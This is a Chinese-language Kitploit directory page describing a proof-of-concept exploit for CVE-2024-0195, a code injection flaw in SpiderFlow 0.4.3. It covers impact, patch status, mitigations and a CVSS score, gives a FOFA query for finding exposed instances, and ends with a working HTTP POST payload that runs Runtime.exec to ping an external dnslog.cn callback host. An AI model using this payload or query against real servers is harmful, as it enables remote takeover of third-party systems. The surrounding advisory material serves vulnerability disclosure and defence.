Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 的概念验证利用程序,这是 SpiderFlow 0.4.3 中的一个严重代码注入漏洞,可通过 FunctionService.saveFunction 端点实现远程代码执行。 | Kitploit
工具/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 的概念验证利用程序,这是 SpiderFlow 0.4.3 中的一个严重代码注入漏洞,可通过 FunctionService.saveFunction 端点实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

CVE-2024-0195 代码生成控制不当('代码注入')严重漏洞 2024

摘要

CVE-2024-0195 是 spider-flow 0.4.3 Web 应用程序中的严重代码注入漏洞,具体存在于 FunctionController.java 文件中的 FunctionService.saveFunction 函数。攻击者可以远程注入恶意代码并在服务器上执行,从而导致应用程序完全沦陷。

影响..

该漏洞极为严重,因为它允许在托管易受攻击的 spider-flow 应用的服务器上远程执行代码。攻击者可以完全控制服务器、窃取敏感数据、安装恶意软件或加密货币挖矿程序,并用于在网络内部发起进一步攻击。应用程序和服务器的机密性、完整性和可用性均受到严重影响。

补丁

未明确提及已修复的版本,因此目前似乎无法通过打补丁来解决。该漏洞已公开披露,且存在可利用的攻击代码,因此立即采取缓解措施至关重要。

缓解措施

在官方补丁发布之前,应立即将 spider-flow 0.4.3 下线,或仅限制受信任的网络/用户访问。作为一种临时缓解措施,可以配置 Web 应用防火墙或其他输入验证控制,以检测并阻止代码注入攻击尝试。然而,这些并非完整的解决方案,一旦有修复版本可用,应立即升级存在漏洞的版本。

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

利用

FOFA : app="spiderflow"

✔ 概念验证

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
下载工具